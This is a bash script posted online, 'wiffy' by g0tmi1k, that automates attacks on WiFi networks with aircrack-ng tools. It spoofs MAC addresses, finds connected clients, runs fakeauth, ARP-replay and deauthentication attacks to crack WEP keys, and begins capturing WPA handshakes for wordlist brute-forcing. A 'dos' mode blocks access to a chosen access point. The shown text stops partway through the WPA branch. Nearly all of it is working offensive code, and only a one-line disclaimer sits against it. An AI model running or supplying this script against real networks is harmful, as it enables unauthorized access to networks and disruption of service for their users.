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Jul 20th, 2013
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  1. #!/bin/bash
  2. #----------------------------------------------------------------------------------------------#
  3. v0.1 (#5 2010-09-13) #
  4. # (C)opyright 2010 - g0tmi1k #
  5. #---License------------------------------------------------------------------------------------#
  6. # This program is free software: you can redistribute it and/or modify it under the terms #
  7. # of the GNU General Public License as published by the Free Software Foundation, either #
  8. # version 3 of the License, or (at your option) any later version. #
  9. # #
  10. # This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; #
  11. # without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. #
  12. # See the GNU General Public License for more details. #
  13. # #
  14. # You should have received a copy of the GNU General Public License along with this program. #
  15. # If not, see <>. #
  16. #---Important----------------------------------------------------------------------------------#
  17. # *** Do NOT use this for illegal or malicious use *** #
  18. #---Defaults-----------------------------------------------------------------------------------#
  19. # The interfaces you use
  20. interface="wlan0"
  22. # [crack/dos] Crack - cracks WiFi Keys, dos - blocks access to ap.
  23. mode="crack"
  25. # [random/set/false] Change the MAC address
  26. macMode="set"
  27. fakeMac="00:05:7c:9a:58:3f"
  29. # [/path/to/the/folder] The file used to brute force WPA keys.
  30. wordlist="/pentest/passwords/wordlists/wpa.txt"
  32. # [true/false] Connect to network afterwords
  33. extras="false"
  35. # [true/false] diagnostics = Creates a output file displays exactly whats going on. [0/1/2] verbose Shows more info. 0=normal, 1=more , 2=more+commands
  36. diagnostics="false"
  37. verbose="0"
  39. #---Variables----------------------------------------------------------------------------------#
  40. version="0.1 (#5)" # Version
  41. monitorInterface="mon0" # Default
  42. bssid="" # null the value
  43. essid="" # null the value
  44. channel="" # null the value
  45. client="" # null the value
  46. debug="false" # Windows don't close, shows extra stuff
  47. logFile="wiffy.log" # filename of output
  48. trap 'cleanup interrupt' 2 # Captures interrupt signal (Ctrl + C)
  50. #----Functions---------------------------------------------------------------------------------#
  51. function findAP () { #findAP
  52. action "Scanning network" "rm -f /tmp/wiffy.tmp && iwlist $interface scan > /tmp/wiffy.tmp" $verbose $diagnostics "true"
  53. #arrayESSID=( $(cat /tmp/wiffy.tmp | awk -F":" '/ESSID/{print $2}') )
  54. arrayBSSID=( $(cat /tmp/wiffy.tmp | grep "Address:" | awk '{print $5}\') )
  55. arrayChannel=( $(cat /tmp/wiffy.tmp | grep "Channel:" | tr ':' ' ' | awk '{print $2}\') )
  56. arrayProtected=( $(cat /tmp/wiffy.tmp | grep "key:" | sed 's/.*key://g') )
  57. arrayQuality=( $(cat /tmp/wiffy.tmp | grep "Quality" | sed 's/.*Quality=//g' | awk -F " " '{print $1}' ) )
  59. id=""
  60. index="0"
  61. for item in "${arrayBSSID[@]}"; do
  62. if [ "$bssid" ] && [ "$bssid" == "$item" ] ; then id="$index" ;fi
  63. command=$(cat /tmp/wiffy.tmp | sed -n "/$item/, +20p" | grep "WPA" )
  64. if [ "$command" ] ; then arrayEncryption[$index]="WPA"
  65. elif [ ${arrayProtected[$index]} == "off" ] ; then arrayEncryption[$index]="N/A"
  66. else arrayEncryption[$index]="WEP" ; fi
  67. index=$(($index+1))
  68. done
  70. #-Cheap hack to support essids with spaces in-----------------------------------------------------------
  71. cat /tmp/wiffy.tmp | awk -F":" '/ESSID/{print $2}' | sed 's/\"//' | sed 's/\(.*\)\"/\1/' > /tmp/wiffy.ssid
  72. index="0"
  73. while read line ; do
  74. if [ "$essid" ] && [ "$essid" == "$line" ] ; then id="$index" ; fi
  75. arrayESSID[$index]="$line"
  76. index=$(($index+1))
  77. done < "/tmp/wiffy.ssid"
  78. rm -f /tmp/wiffy.ssid
  79. #--------------------------------------------------------------------------------------------------------------
  80. }
  81. function findClient () { #findClient $encryption
  82. if [ -z "$1" ] ; then error="1" ; fi # Coding error
  83. if [ "$error" == "free" ] ; then
  84. client=""
  85. action "Removing temp files" "rm -f /tmp/wiffy.dump* && sleep 1" $verbose $diagnostics "true"
  86. action "airodump-ng (client(s))" "airodump-ng --bssid $bssid --channel $channel --write /tmp/wiffy.dump --output-format netxml $monitorInterface" $verbose $diagnostics "true" &
  87. sleep 3
  89. if [ "$1" == "WEP" ] || [ "$1" == "N/A" ] ; then # N/A = For MAC filtering
  90. sleep 5
  91. client=$(cat "/tmp/wiffy.dump-01.kismet.netxml" | grep "client-mac" | tr -d '\t' | sed 's/^<.*>\([^<].*\)<.*>$/\1/' | head -1)
  92. elif [ "$1" == "WPA" ] ; then
  93. while [ -z "$client" ] ; do
  94. sleep 2
  95. client=$(cat "/tmp/wiffy.dump-01.kismet.netxml" | grep "client-mac" | tr -d '\t' | sed 's/^<.*>\([^<].*\)<.*>$/\1/' | head -1)
  96. done
  97. fi
  99. if [ -z "$essid" ] ; then
  100. essid=$(cat "/tmp/wiffy.dump-01.kismet.netxml" | grep "<essid cloaked=\"false\">" | tr -d '\t' | sed 's/^<.*>\([^<].*\)<.*>$/\1/')
  101. if [ "$verbose" != "0" ] || [ "$diagnostics" == "true" ] || [ "$debug" == "true" ] ; then display info "*hidden* essid=$essid" $diagnostics ; fi
  102. fi
  104. command=$(ps aux | grep "airodump-ng" | awk '!/grep/ && !/awk/ && !/cap/ {print $2}' | while read line; do echo -n "$line "; done | awk '{print}')
  105. if [ -n "$command" ] ; then
  106. action "Killing programs" "kill $command" $verbose $diagnostics "true"
  107. sleep 1
  108. fi
  110. action "Removing temp files" "rm -f /tmp/wiffy.dump*" $verbose $diagnostics "true"
  111. if [ "$client" == "" ] ; then client="clientless" ; fi
  112. if [ "$verbose" != "0" ] || [ "$diagnostics" == "true" ] || [ "$debug" == "true" ] ; then display info "client=$client" $diagnostics ; fi
  113. return 0
  114. else
  115. display error "findClient. Error code: $error" $diagnostics 1>&2
  116. return 1
  117. fi
  118. }
  119. function update() { # update
  120. if [ -e "/usr/bin/svn" ] ; then
  121. display action "Checking for an update..." $diagnostics
  122. update=$(svn info | grep "Last Changed Rev:" |cut -c11-)
  123. if [ "$version" != "0.3 (#$update)" ] ; then
  124. display info "Updating..." $diagnostics
  125. svn export -q --force
  126. display info "Updated to $update. (=" $diagnostics
  127. else
  128. display info "You're using the latest version. (=" $diagnostics
  129. fi
  130. else
  131. display info "Updating..." $diagnostics
  132. wget -nv -N
  133. display info "Updated! (=" $diagnostics
  134. fi
  135. echo
  136. exit 2
  137. }
  138. function cleanup() { # cleanup mode
  139. if [ "$1" == "nonuser" ] ; then exit 3 ; fi
  141. action "Killing xterm" "killall xterm" $verbose $diagnostics "true"
  142. if [ "$1" != "clean" ] ; then
  143. echo # Blank line
  144. if [ "$verbose" != "0" ] || [ "$diagnostics" == "true" ] || [ "$debug" == "true" ] ; then display info "*** BREAK ***" $diagnostics ; fi # User quit
  145. fi
  146. display action "Restoring: Environment" $diagnostics
  148. command=$(ifconfig -a | grep $monitorInterface | awk '{print $1}')
  149. if [ "$command" == "$monitorInterface" ] ; then
  150. sleep 3 # Sometimes it needs to catch up/wait
  151. action "Monitor Mode (Stopping)" "airmon-ng stop $monitorInterface" $verbose $diagnostics "true"
  152. fi
  154. if [ "$debug" != "true" ] ; then
  155. command=""
  156. tmp=$(ls /tmp/wiffy-*.cap 2> /dev/null)
  157. if [ "$tmp" ] ; then command="$command /tmp/wiffy-*" ; fi
  158. tmp=$(ls /tmp/wiffy.dump*.netxml 2> /dev/null)
  159. if [ "$tmp" ] ; then command="$command /tmp/wiffy.dump*" ; fi
  160. tmp=$(ls replay_arp*.cap 2> /dev/null)
  161. if [ "$tmp" ] ; then command="$command replay_arp*.cap" ; fi
  162. if [ -e "/tmp/wiffy.key" ] ; then command="$command /tmp/wiffy.key" ; fi
  163. if [ -e "/tmp/wiffy.tmp" ] ; then command="$command /tmp/wiffy.tmp" ; fi
  164. if [ -e "/tmp/wiffy.conf" ] ; then command="$command /tmp/wiffy.conf" ; fi
  165. if [ -e "/tmp/wiffy.handshake" ] ; then command="$command /tmp/wiffy.handshake" ; fi
  166. if [ ! -z "$command" ] ; then action "Removing temp files" "rm -rfv $command" $verbose $diagnostics "true" ; fi
  167. fi
  169. echo -e "\e[01;36m[*]\e[00m Done! (= Have you... g0tmi1k?"
  170. exit 0
  171. }
  172. function help() {
  173. echo "(C)opyright 2010 g0tmi1k ~
  175. Usage: bash -i [interface] -t [interface] -m [crack/dos] -e [essid] -b [bssid]
  176. -c [mac] -w [/path/to/file] (-z / -s [mac]) -x -d (-v / -V) ([-u] [-?])
  178. Options:
  179. -i --- Internet Interface e.g. $interface
  180. -t --- Monitor Interface e.g. $monitorInterface
  182. -m --- Mode. e.g. $mode
  184. -e --- ESSID (WiFi Name)
  185. -b --- BSSID (AP MAC Address)
  186. -c --- Client that is connect to the acess point
  188. -w --- Path to Wordlist e.g. $wordlist
  190. -z --- Change interface's MAC Address e.g. $macMode
  191. -s --- Use this MAC Address e.g. $fakeMac
  193. -x --- Connect to network afterwords
  195. -d --- Diagnostics (Creates output file, $logFile)
  196. -v --- Verbose (Displays more)
  197. -V --- (Higher) Verbose (Displays more + shows commands)
  199. -u --- Update
  200. -? --- This
  204. Known issues:
  205. -WEP
  206. > Didn't detect my client
  207. + Add it in manually
  208. + Re-run the script
  209. > IV's doesn't increae
  210. + DeAuth didn't work --- Client using Windows 7?
  211. + Use a different router/client
  213. -WPA
  214. > You can ONLY crack WPA when:
  215. + The ESSID is known
  216. + The WiFi key is in the word-list
  217. + There is a connected client
  219. -Doesn't detect any/my wireless network
  220. > Don't run from a virtual machine
  221. > Driver issue - Use a different WiFi device
  222. > Try the 're[f]resh' option
  223. > Unplug WiFi device, wait, replug
  224. > You're too close/far away
  226. -\"Extras\" doesn't work
  227. > Network doesn't have a DHCP server
  229. -Slow
  230. > Try a different attack... manually!
  231. "
  232. exit 1
  233. }
  234. function action() { # action title command $verbose $diagnostics screen&file x|y|lines hold
  235. error="free"
  236. if [ -z "$1" ] || [ -z "$2" ] ; then error="1" ; fi # Coding error
  237. if [ "$error" == "free" ] ; then
  238. xterm="xterm" #Defaults
  239. command=$2
  240. x="100"
  241. y="0"
  242. lines="15"
  243. if [ "$7" == "hold" ] ; then xterm="$xterm -hold" ; fi
  244. if [ "$3" == "2" ] ; then echo "Command: $command" ; fi
  245. if [ "$4" == "true" ] ; then echo "$1~$command" >> $logFile ; fi
  246. if [ "$4" == "true" ] && [ "$5" == "true" ] ; then command="$command | tee -a $logFile" ; fi
  247. if [ ! -z "$6" ] ; then
  248. x=$(echo $6 | cut -d'|' -f1)
  249. y=$(echo $6 | cut -d'|' -f2)
  250. lines=$(echo $6 | cut -d'|' -f3)
  251. fi
  252. $xterm -geometry 100x$lines+$x+$y -T "wiffy v$version - $1" -e "$command"
  253. return 0
  254. else
  255. display error "action. Error code: $error" $diagnostics 1>&2
  256. echo -e "---------------------------------------------------------------------------------------------\n-->ERROR: action (Error code: $error): $1 , $2 , $3 , $4 , $5 , $6, $7" >> $logFile ;
  257. return 1
  258. fi
  259. }
  260. function display() { # display type message $diagnostics
  261. error="free"
  262. if [ -z "$1" ] || [ -z "$2" ] ; then error="1" ; fi # Coding error
  263. if [ "$1" != "action" ] && [ "$1" != "info" ] && [ "$1" != "diag" ] && [ "$1" != "error" ] ; then error="5"; fi # Coding error
  264. if [ "$error" == "free" ] ; then
  265. output=""
  266. if [ "$1" == "action" ] ; then output="\e[01;32m[>]\e[00m" ; fi
  267. if [ "$1" == "info" ] ; then output="\e[01;33m[i]\e[00m" ; fi
  268. if [ "$1" == "diag" ] ; then output="\e[01;34m[+]\e[00m" ; fi
  269. if [ "$1" == "error" ] ; then output="\e[01;31m[-]\e[00m" ; fi
  270. output="$output $2"
  271. echo -e "$output"
  272. if [ "$3" == "true" ] ; then
  273. if [ "$1" == "action" ] ; then output="[>]" ; fi
  274. if [ "$1" == "info" ] ; then output="[i]" ; fi
  275. if [ "$1" == "diag" ] ; then output="[+]" ; fi
  276. if [ "$1" == "error" ] ; then output="[-]" ; fi
  277. echo -e "---------------------------------------------------------------------------------------------\n$output $2" >> $logFile
  278. fi
  279. return 0
  280. else
  281. display error "display. Error code: $error" $logFile 1>&2
  282. echo -e "---------------------------------------------------------------------------------------------\n-->ERROR: display (Error code: $error): $1 , $2 , $3 " >> $logFile ;
  283. return 1
  284. fi
  285. }
  288. #----------------------------------------------------------------------------------------------#
  289. echo -e "\e[01;36m[*]\e[00m wiffy v$version"
  291. #----------------------------------------------------------------------------------------------#
  292. while getopts "i:t:m:e:b:c:w:z:s:xdvVu?" OPTIONS; do
  293. case ${OPTIONS} in
  294. i ) interface=$OPTARG;;
  295. t ) monitorInterface=$OPTARG;;
  296. m ) mode=$OPTARG;;
  297. e ) essid=$OPTARG;;
  298. b ) bssid=$OPTARG;;
  299. c ) client=$OPTARG;;
  300. w ) wordlist=$OPTARG;;
  301. z ) macMode=$OPTARG;;
  302. s ) fakeMac=$OPTARG;;
  303. x ) extras="true";;
  304. d ) diagnostics="true";;
  305. v ) verbose="1";;
  306. V ) verbose="2";;
  307. u ) update;;
  308. ? ) help;;
  309. * ) display error "Unknown option." $diagnostics 1>&2 ;; # Default
  310. esac
  311. done
  313. #----------------------------------------------------------------------------------------------#
  314. if [ "$debug" == "true" ] ; then
  315. display info "Debug mode" $diagnostics
  316. fi
  317. if [ "$diagnostics" == "true" ] ; then
  318. display diag "Diagnostics mode" $diagnostics
  319. echo -e "wiffy v$version\n$(date)" > $logFile
  320. echo "" $* >> $logFile
  321. fi
  323. #----------------------------------------------------------------------------------------------#
  324. display action "Analyzing: Environment" $diagnostics
  326. #----------------------------------------------------------------------------------------------#
  327. if [ "$(id -u)" != "0" ] ; then display error "Not a superuser." $diagnostics 1>&2 ; cleanup nonuser; fi
  329. #----------------------------------------------------------------------------------------------#
  330. command=""
  331. tmp=$(ls /tmp/wiffy-*.cap 2> /dev/null)
  332. if [ "$tmp" ] ; then command="$command /tmp/wiffy-*" ; fi
  333. tmp=$(ls /tmp/wiffy.dump*.netxml 2> /dev/null)
  334. if [ "$tmp" ] ; then command="$command /tmp/wiffy.dump*" ; fi
  335. tmp=$(ls replay_arp*.cap 2> /dev/null)
  336. if [ "$tmp" ] ; then command="$command replay_arp*.cap" ; fi
  337. if [ -e "/tmp/wiffy.key" ] ; then command="$command /tmp/wiffy.key" ; fi
  338. if [ -e "/tmp/wiffy.tmp" ] ; then command="$command /tmp/wiffy.tmp" ; fi
  339. if [ -e "/tmp/wiffy.conf" ] ; then command="$command /tmp/wiffy.conf" ; fi
  340. if [ -e "/tmp/wiffy.handshake" ] ; then command="$command /tmp/wiffy.handshake" ; fi
  341. if [ ! -z "$command" ] ; then action "Removing old files" "rm -rfv $command" $verbose $diagnostics "true" ; fi
  343. #----------------------------------------------------------------------------------------------#
  344. if [ -z "$interface" ] ; then display error "interface can't be blank" $diagnostics 1>&2 ; cleanup; fi
  345. if [ -z "$monitorInterface" ] ; then display error "monitorInterface can't be blank" $diagnostics 1>&2 ; cleanup; fi
  346. if [ "$mode" != "crack" ] && [ "$mode" != "dos" ] ; then display error "mode ($mode) isn't correct" $diagnostics 1>&2 ; cleanup; fi
  347. if [ ! -e "$wordlist" ] ; then display error "There isn't a wordlist at $wordlist" $diagnostics 1>&2 ; cleanup; fi
  348. if [ "$macMode" != "random" ] && [ "$macMode" != "set" ] && [ "$macMode" != "false" ] ; then display error "macMode ($macMode) isn't correct" $diagnostics 1>&2 ; cleanup; fi
  349. if [ "$macMode" == "set" ] ; then if [ -z "$fakeMac" ] || [ ! $(echo $fakeMac | egrep "^([0-9a-fA-F]{2}\:){5}[0-9a-fA-F]{2}$") ] ; then display error "fakeMac ($fakeMac) isn't correct" $diagnostics 1>&2 ; cleanup; fi ; fi
  350. if [ "$mode" == "crack" ] && [ "$extras" != "true" ] && [ "$extras" != "false" ] ; then display error "extras ($extras) isn't correct" $diagnostics 1>&2 ; cleanup; fi
  351. if [ "$diagnostics" != "true" ] && [ "$diagnostics" != "false" ] ; then display error "diagnostics ($diagnostics) isn't correct" $diagnostics 1>&2 ; cleanup; fi
  352. if [ "$verbose" != "0" ] && [ "$verbose" != "1" ] && [ "$verbose" != "2" ] ; then display error "verbose ($verbose) isn't correct" $diagnostics 1>&2 ; cleanup; fi
  353. if [ -z "$version" ] ; then display error "version ($version) isn't correct" $diagnostics 1>&2 ; cleanup; fi
  354. if [ "$debug" != "true" ] && [ "$debug" != "false" ] ; then display error "debug ($debug) isn't correct" $diagnostics 1>&2 ; cleanup; fi
  355. if [ "$diagnostics" == "true" ] && [ -z "$logFile" ] ; then display error "logFile ($logFile) isn't correct" $diagnostics 1>&2 ; cleanup ; fi
  357. #----------------------------------------------------------------------------------------------#
  358. command=$(iwconfig $interface 2>/dev/null | grep "802.11" | cut -d" " -f1)
  359. if [ ! $command ]; then
  360. display error "$interface isn't a wireless interface." $diagnostics
  361. display info "Searching for a wireless interface" $diagnostics
  362. command=$(iwconfig 2>/dev/null | grep "802.11" | cut -d" " -f1) #| awk '!/"'"$interface"'"/'
  363. if [ $command ] ; then
  364. interface=$command
  365. display info "Found $interface" $diagnostics
  366. else
  367. display error "Couldn't find a wireless interface." $diagnostics 1>&2
  368. cleanup
  369. fi
  370. fi
  372. command=$(ifconfig -a | grep $interface | awk '{print $1}')
  373. if [ "$command" != "$interface" ] ; then
  374. display error "The wireless interface $interface, isn't correct." $diagnostics 1>&2
  375. if [ "$debug" == "true" ] ; then iwconfig; fi
  376. cleanup
  377. fi
  379. #----------------------------------------------------------------------------------------------#
  380. mac=$(macchanger --show $interface | awk -F " " '{print $3}')
  382. #----------------------------------------------------------------------------------------------#
  383. if [ "$verbose" != "0" ] || [ "$diagnostics" == "true" ] || [ "$debug" == "true" ] ; then display action "Stopping: Programs" $diagnostics ; fi
  384. command=$(ps aux | grep $interface | awk '!/grep/ && !/awk/ && !/wiffy/ {print $2}' | while read line; do echo -n "$line "; done | awk '{print}')
  385. if [ -n "$command" ] ; then
  386. action "Killing programs" "kill $command" $verbose $diagnostics "true" # to prevent interference
  387. fi
  388. action "Killing 'Programs'" "killall wicd-client airodump-ng xterm" $verbose $diagnostics "true" # Killing "wicd-client" to prevent channel hopping
  389. action "Killing 'wicd service'" "/etc/init.d/wicd stop" $verbose $diagnostics "true" # Stopping wicd to prevent channel hopping
  391. #----------------------------------------------------------------------------------------------#
  392. action "Refreshing interface" "ifconfig $interface down && ifconfig $interface up && sleep 1" $verbose $diagnostics "true"
  393. loopMain="false"
  394. while [ "$loopMain" != "true" ] ; do
  395. findAP
  396. if [ "$id" ] ; then
  397. loopMain="true"
  398. else
  399. if [ "$essid" ] ; then display error "Couldnt find essid ($essid)" $diagnostics 1>&2 ; fi
  400. if [ "$bssid" ] ; then display error "Couldnt find bssid ($bssid)" $diagnostics 1>&2 ; fi
  401. loop=${#arrayBSSID[@]}
  402. echo -e " Num | ESSID | BSSID | Protected | Cha | Quality\n-----|------------------------|-------------------|-----------|-----|---------"
  403. for (( i=0;i<$loop;i++)); do
  404. printf ' %-2s | %-22s | %-16s | %3s (%-3s) | %-3s| %-6s\n' "$(($i+1))" "${arrayESSID[${i}]}" "${arrayBSSID[${i}]}" "${arrayProtected[${i}]}" "${arrayEncryption[${i}]}" "${arrayChannel[${i}]}" "${arrayQuality[${i}]}"
  405. done
  406. loopSub="false"
  407. while [ "$loopSub" != "true" ] ; do
  408. read -p "[~] re[s]can, re[f]resh, e[x]it or select num: "
  409. if [ "$REPLY" == "x" ] ; then cleanup clean
  410. elif [ "$REPLY" == "s" ] ; then loopSub="true" # aka do nothing
  411. elif [ "$REPLY" == "f" ] ; then action "Refreshing interface" "ifconfig $interface down && sleep 1 && ifconfig $interface up && sleep 1" $verbose $diagnostics "true" && loopSub="true" # aka do nothing
  412. elif [ -z $(echo "$REPLY" | tr -dc '[:digit:]'l) ] ; then display error "Bad input, $REPLY" $diagnostics 1>&2
  413. elif [ "$REPLY" -lt 1 ] || [ "$REPLY" -gt $loop ] ; then display error "Incorrect number, $REPLY" $diagnostics 1>&2
  414. else id="$(($REPLY-1))" ; loopSub="true" ; loopMain="true"
  415. fi
  416. done
  417. fi
  418. done
  419. essid="${arrayESSID[$id]}"
  420. bssid="${arrayBSSID[$id]}"
  421. channel="${arrayChannel[$id]}"
  422. encryption="${arrayEncryption[$id]}"
  424. #----------------------------------------------------------------------------------------------#
  425. if [ "$diagnostics" == "true" ] ; then
  426. echo "-Settings------------------------------------------------------------------------------------
  427. interface=$interface
  428. monitorInterface=$monitorInterface
  429. mode=$mode
  430. essid=$essid
  431. bssid=$bssid
  432. encryption=$encryption
  433. channel=$channel
  434. client=$client
  435. wordlist=$wordlist
  436. mac=$mac
  437. macMode=$macMode
  438. fakeMac=$fakeMac
  439. diagnostics=$diagnostics
  440. verbose=$verbose
  441. debug=$debug
  442. -Environment---------------------------------------------------------------------------------" >> $logFile
  443. display diag "Detecting: Kernal" $diagnostics
  444. uname -a >> $logFile
  445. display diag "Detecting: Hardware" $diagnostics
  446. lspci -knn >> $logFile
  447. fi
  448. if [ "$debug" == "true" ] || [ "$verbose" != "0" ] ; then
  449. display info " interface=$interface
  450. \e[01;33m[i]\e[00m monitorInterface=$monitorInterface
  451. \e[01;33m[i]\e[00m mode=$mode
  452. \e[01;33m[i]\e[00m essid=$essid
  453. \e[01;33m[i]\e[00m bssid=$bssid
  454. \e[01;33m[i]\e[00m encryption=$encryption
  455. \e[01;33m[i]\e[00m channel=$channel
  456. \e[01;33m[i]\e[00m client=$client
  457. \e[01;33m[i]\e[00m wordlist=$wordlist
  458. \e[01;33m[i]\e[00m mac=$mac
  459. \e[01;33m[i]\e[00m macMode=$macMode
  460. \e[01;33m[i]\e[00m fakeMac=$fakeMac
  461. \e[01;33m[i]\e[00m diagnostics=$diagnostics
  462. \e[01;33m[i]\e[00m verbose=$verbose
  463. \e[01;33m[i]\e[00m debug=$debug"
  464. fi
  466. #----------------------------------------------------------------------------------------------#
  467. if [ ! -e "/usr/sbin/airmon-ng" ] && [ ! -e "/usr/local/sbin/airmon-ng" ] ; then
  468. display error "aircrack-ng isn't installed." $diagnostics 1>&2
  469. read -p "[~] Would you like to try and install it? [Y/n]: " -n 1
  470. if [[ $REPLY =~ ^[Yy]$ ]] ; then action "Install aircrack-ng" "apt-get -y install aircrack-ng" $verbose $diagnostics "true" ; fi
  471. if [ ! -e "/usr/sbin/airmon-ng" ] && [ ! -e "/usr/local/sbin/airmon-ng" ] ; then
  472. display error "Failed to install aircrack-ng" $diagnostics 1>&2 ; cleanup
  473. else
  474. display info "Installed aircrack-ng" $diagnostics
  475. fi
  476. fi
  477. if [ ! -e "/usr/bin/macchanger" ] ; then
  478. display error "macchanger isn't installed." $diagnostics
  479. read -p "[~] Would you like to try and install it? [Y/n]: " -n 1
  480. if [[ $REPLY =~ ^[Yy]$ ]] ; then action "Install macchanger" "apt-get -y install macchanger" $verbose $diagnostics "true" ; fi
  481. if [ ! -e "/usr/bin/macchanger" ] ; then
  482. display error "Failed to install macchanger" $diagnostics 1>&2 ; cleanup
  483. else
  484. display info "Installed macchanger" $diagnostics
  485. fi
  486. fi
  487. #if [ "$attack" == "inject" ] ; then
  488. # if [ ! -e "/pentest/wireless/airpwn-1.4/airpwn" ] ; then
  489. # display error "airpwn isn't installed." $diagnostics
  490. # read -p "[~] Would you like to try and install it? [Y/n]: " -n 1
  491. # if [[ $REPLY =~ ^[Yy]$ ]] ; then action "Install airpwn" "apt-get -y install libnet1-dev libpcap-dev python2.4-dev libpcre3-dev libssl-dev" $verbose $diagnostics "true" ; fi
  492. # action "Install airpwn" "wget -P /tmp && tar -C /pentest/wireless -xvf /tmp/airpwn-1.4.tgz && rm /tmp/airpwn-1.4.tgz" $verbose $diagnostics "true"
  493. # find="#include <linux/if.h>\n#ifndef _LINUX_WIRELESS_H"
  494. # replace="#ifndef _LINUX_WIRELESS_H"
  495. # sed "s/$find/$replace/g" "/usr/include/linux/wireless.h" > "/usr/include/linux/"
  496. # find="#ifndef _LINUX_WIRELESS_H"
  497. # replace="#include <linux/if.h>\n#ifndef _LINUX_WIRELESS_H"
  498. # sed "s/$find/$replace/g" "/usr/include/linux/" > "/usr/include/linux/wireless.h"
  499. # rm -f "/usr/include/linux/"
  500. # action "Install airpwn" "command=$(pwd) && tar -C /pentest/wireless/airpwn-1.4 -xvf /pentest/wireless/airpwn-1.4/lorcon-current.tgz && cd /pentest/wireless/airpwn-1.4/lorcon && ./configure && make && make install && cd $command" $verbose $diagnostics "true"
  501. # action "Install airpwn" "command=$(pwd) && cd /pentest/wireless/airpwn-1.4 && ./configure && make && cd $command" $verbose $diagnostics "true"
  502. # if [ ! -e "/pentest/wireless/airpwn-1.4/airpwn" ] ; then
  503. # display error "Failed to install airpwn" $diagnostics 1>&2 ; cleanup
  504. # else
  505. # display info "Installed airpwn" $diagnostics
  506. # fi
  507. # fi
  508. #fi
  510. #----------------------------------------------------------------------------------------------#
  511. display action "Configuring: Environment" $diagnostics
  513. #----------------------------------------------------------------------------------------------#
  514. if [ "$verbose" != "0" ] || [ "$diagnostics" == "true" ] || [ "$debug" == "true" ] ; then display action "Configuring: Wireless card" $diagnostics ; fi
  515. command=$(ifconfig -a | grep $monitorInterface | awk '{print $1}')
  516. if [ "$command" == "$monitorInterface" ] ; then
  517. action "Monitor Mode (Stopping)" "airmon-ng stop $monitorInterface" $verbose $diagnostics "true"
  518. sleep 1
  519. fi
  521. action "Monitor Mode (Starting)" "airmon-ng start $interface | awk '/monitor mode enabled on/ {print \$5}' | tr -d '\011' | sed -e \"s/(monitor mode enabled on //\" | sed 's/\(.*\)./\1/' > /tmp/wiffy.tmp" $verbose $diagnostics "true"
  522. command=$(cat /tmp/wiffy.tmp)
  523. if [ "$monitorInterface" != "$command" ] ; then
  524. if [ "$verbose" != "0" ] || [ "$diagnostics" == "true" ] || [ "$debug" == "true" ] ; then
  525. display info "Configuring: Chaning monitorInterface to: $command" $diagnostics
  526. fi
  527. monitorInterface=$command
  528. fi
  530. command=$(ifconfig -a | grep $monitorInterface | awk '{print $1}')
  531. if [ "$command" != "$monitorInterface" ] ; then
  532. sleep 5 # Some people need to wait a little bit longer (e.g. VM), some don't. Don't force the ones that don't need it!
  533. command=$(ifconfig -a | grep $monitorInterface | awk '{print $1}')
  534. if [ "$command" != "$monitorInterface" ] ; then
  535. display error "The monitor interface $monitorInterface, isn't correct." $diagnostics 1>&2
  536. if [ "$debug" == "true" ] ; then iwconfig; fi
  537. cleanup
  538. fi
  539. fi
  541. #----------------------------------------------------------------------------------------------#
  542. if [ "$diagnostics" == "true" ] || [ "$debug" == "true" ] ; then
  543. display diag "Testing: Wireless Injection" $diagnostics
  544. command=$(aireplay-ng --test $monitorInterface -i $monitorInterface)
  545. if [ "$diagnostics" == "true" ] ; then echo -e $command >> $logFile ; fi
  546. if [ -z "$(echo \"$command\" | grep 'Injection is working')" ] ; then display error "$monitorInterface doesn't support packet injecting." $diagnostics 1>&2
  547. elif [ -z "$(echo \"$command\" | grep 'Found 0 APs')" ] ; then display error "Couldn't test packet injection" $diagnostics 1>&2 ;
  548. fi
  549. fi
  551. #----------------------------------------------------------------------------------------------#
  552. if [ "$macMode" != "false" ] ; then
  553. if [ "$verbose" != "0" ] || [ "$diagnostics" == "true" ] || [ "$debug" == "true" ] ; then display action "Configuring: MAC address" $diagnostics ; fi
  554. command="ifconfig $monitorInterface down &&"
  555. if [ "$macMode" == "random" ] ; then command="$command macchanger -A $monitorInterface &&"; fi
  556. if [ "$macMode" == "set" ] ; then command="$command macchanger -m $fakeMac $monitorInterface &&"; fi
  557. command="$command ifconfig $monitorInterface up"
  558. action "Configuring: MAC address" "$command" $verbose $diagnostics "true"
  559. sleep 2
  560. mac="$fakeMac"
  561. fi
  563. #----------------------------------------------------------------------------------------------#
  564. if [ "$mode" == "crack" ] ; then
  565. if [ -z "$client" ] ; then
  566. display action "Detecting: Client(s)" $diagnostics
  567. findClient $encryption
  568. fi
  570. #----------------------------------------------------------------------------------------------#
  571. display action "Starting: airodump-ng" $diagnostics
  572. action "Removing temp files" "rm -f /tmp/wiffy* && sleep 1" $verbose $diagnostics "true"
  573. action "airodump-ng" "airodump-ng --bssid $bssid --channel $channel --write /tmp/wiffy --output-format cap $monitorInterface" $verbose $diagnostics "true" "0|0|13" & # Don't wait, do the next command
  574. sleep 1
  576. #----------------------------------------------------------------------------------------------#
  577. if [ "$encryption" == "WEP" ] ; then
  578. if [ "$client" == "clientless" ] ; then
  579. display action "Attack (FakeAuth): $fakeMac" $diagnostics
  580. action "aireplay-ng (fakeauth)" "aireplay-ng --fakeauth 0 -e \"$essid\" -a $bssid -h $mac $monitorInterface" $verbose $diagnostics "true"
  581. #action "aireplay-ng (fakeauth)" "aireplay-ng --fakeauth 30 -o 1 -q 10 -e \"$essid\" -a $bssid -h $fakeMac $monitorInterface" $verbose $diagnostics "true"
  582. #if [Association successful] = then
  583. client=$mac
  584. sleep 1
  585. fi
  586. display action "Attack (ARPReplay+Deauth): $client" $diagnostics
  587. action "aireplay-ng (arpreplay)" "aireplay-ng --arpreplay -e \"$essid\" -b $bssid -h $client $monitorInterface" $verbose $diagnostics "true" "0|195|10" & # Don't wait, do the next command
  588. sleep 1
  589. action "aireplay-ng (deauth)" "aireplay-ng --deauth 5 -e \"$essid\" -a $bssid -c $fakeMac $monitorInterface" $verbose $diagnostics "true"
  590. sleep 1
  591. if [ "$client" == "$mac" ] ; then sleep 20 && action "aireplay-ng (fakeauth)" "aireplay-ng --fakeauth 0 -e \"$essid\" -a $bssid -h $fakeMac $monitorInterface" $verbose $diagnostics "true" ; fi
  592. sleep 60
  594. #----------------------------------------------------------------------------------------------#
  595. elif [ "$encryption" == "WPA" ] ; then
  596. display action "Capturing: Handshake" $diagnostics
  597. loop="0" # 0 = first, 1 = client, 2 = everyone
